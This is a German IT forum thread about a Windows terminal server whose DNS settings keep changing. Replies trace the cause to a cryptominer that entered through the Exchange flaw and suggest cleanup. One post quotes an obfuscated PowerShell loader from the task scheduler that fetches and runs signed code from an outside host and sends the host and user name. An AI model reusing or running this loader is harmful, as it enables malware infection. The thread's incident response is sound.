puerto
Goto Top

DNS-Eintrag ändert sich selbstständig

Hallo liebe Gemeinde,

Es geht um einen Terminal-Server Windows 2012 R2, der von einer Domäne in eine andere Domäne migriert wurde.
Nach dem Wechsel der Domäne läuft scheinbar alles normal, die User können sich per RDP anmelden.
Allerdings passiert nach etwa 30-60 Minuten folgendes in den Netzwerkeinstellungen: Der korrekt eingestellte DNS-Server (DC01) wird anscheinend automatisch ersetzt durch 8.8.8.8 und Secondary 9.9.9.9.
Dann kann sich niemand mehr remote anmelden und der DNS muss von Hand wieder eingetragen werden. Das ganze wiederholt sich regelmäßig.

Habt ihr Ideen? Braucht ihr mehr Infos?


Danke und liebe Grüße
puerto

Content-ID: 664924

Url: https://administrator.de/forum/dns-eintrag-aendert-sich-selbststaendig-664924.html

Ausgedruckt am: 22.12.2024 um 11:12 Uhr

JasperBeardley
JasperBeardley 20.03.2021 um 00:26:22 Uhr
Goto Top
Moin,

ich habe grade das hier gelesen.

Gruß
Jasper
bGn
bGn 20.03.2021 aktualisiert um 01:54:07 Uhr
Goto Top
Hi,

nachdem ich jetzt selber 8 std mit dem problem rumgemacht habe und ich schon im bett bin:

1) alle prozesse bzgl powershell beenden.
da sind auch viele kryptische danei
2) im aufgabenplaner alle suspekten einträge löschen
3) c windows temp alle suspekten dateien löschen z.b. .bin
4) c windows system32 windowspowershell v1.0 alle suspekten exe löschen und die powershell.exe vorerst umbenennen

5) dns einträge wieder richtig setzen

6a) microsoft security schnelltest

6b) kaspersky endpoint security 11.6,x testversion laden und voll scannen lassen und an lassen

bis morgen
bGn
bGn 20.03.2021 um 01:52:54 Uhr
Goto Top
Achja, und den gehackten exchange server am besten als allererstes abschalten oder isolieren face-smile vermutlich infiziert bzw remoteshell't der die maschinen übers netz.

Das ist der cryptominer DLTMiner der da bei dir wütet, eingeschleust über die Exchange Lücke von vor 2 Wochen.
tikayevent
tikayevent 20.03.2021 um 08:57:54 Uhr
Goto Top
Schau mal, ob das durch eine GPO erfolgen könnte.
puerto
puerto 20.03.2021 aktualisiert um 13:13:02 Uhr
Goto Top
Ich habe in der Tat in der Aufgabenplanung einige Einträge gefunden, die Powershell ausführen.

z.B.
-c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 133){$b=$d[133..$c];$p=New-  
Object Security.Cryptography.RSAParameters;$p.Modulus=
[convert]::FromBase64String('2m2o17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/Y10WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpU3cv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x00,0x01,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object   
Security.Cryptography.SHA2CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-
join[char[]]$b)}}}$url='http://'+'t.zke'+'r1.com';a($url+'/b.jsp?rep_20210319?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject  
Win32_ComputerSystemProduct).UUID,(random))-join'*'))  


Ich bin ja sehr interessiert, kann mir jemand sagen, was dieser Befehl macht?

System ist bereits isoliert, ich würde gerne etwas forschen, was da los ist.

Danke und liebe Grüße
puerto
bGn
bGn 20.03.2021 um 10:05:53 Uhr
Goto Top
bGn
bGn 20.03.2021 um 10:47:32 Uhr
Goto Top
Hallo tikayevent,

ich konnte bisher nix erkennen, sind keine neuen dazugekommen und die alten auch nicht bearbeitet worden.

Bei mir ist der vermutlich gehackte Exchange isoliert und die Powershell.exe auf dem Server wo das Problem mit dem Crypto Miner besteht umbenannt.

Seit dem keine Auffälligkeiten mehr.
Lochkartenstanzer
Lochkartenstanzer 20.03.2021 aktualisiert um 13:18:08 Uhr
Goto Top
Zitat von @puerto:

Hallo liebe Gemeinde,

Es geht um einen Terminal-Server Windows 2012 R2, der von einer Domäne in eine andere Domäne migriert wurde.
Nach dem Wechsel der Domäne läuft scheinbar alles normal, die User können sich per RDP anmelden.
Allerdings passiert nach etwa 30-60 Minuten folgendes in den Netzwerkeinstellungen: Der korrekt eingestellte DNS-Server (DC01) wird anscheinend automatisch ersetzt durch 8.8.8.8 und Secondary 9.9.9.9.
Dann kann sich niemand mehr remote anmelden und der DNS muss von Hand wieder eingetragen werden. Das ganze wiederholt sich regelmäßig.

Habt ihr Ideen? Braucht ihr mehr Infos?

Du hast Malware auf Deinem System (Exchange-Hack).

Alles neu aufsetzen!

Insbesondere das AD ist anscheinend betroffen.

Nachtrag:

Um es nochmal mit Nachdruk zu sagen: nach den beschriebenen Symptomen ist Dein Netz und AD verseucht. Das sinnvollste ist, alles vom netz zu trennen und frisch hochzuziehen. Ansonsten wirst Du auch noch in einem Jahr immer wieder mit Nachwirkungen zu kämpfen haben. Das ist zwar viel Arbeit udn kostet u.U. auch viel Geld und Zeit, aber das Risiko später viel mehr zeit udn geld zu verlieren schätze ich höher ein. Es gibt schon die ersten Erpressungstrojaner, die auf dem Exchange-Hack aufbauen, bzw. auf den Hintertüren, die dadurch geschaffen wurden.

lks

lks
bGn
bGn 20.03.2021 um 11:00:08 Uhr
Goto Top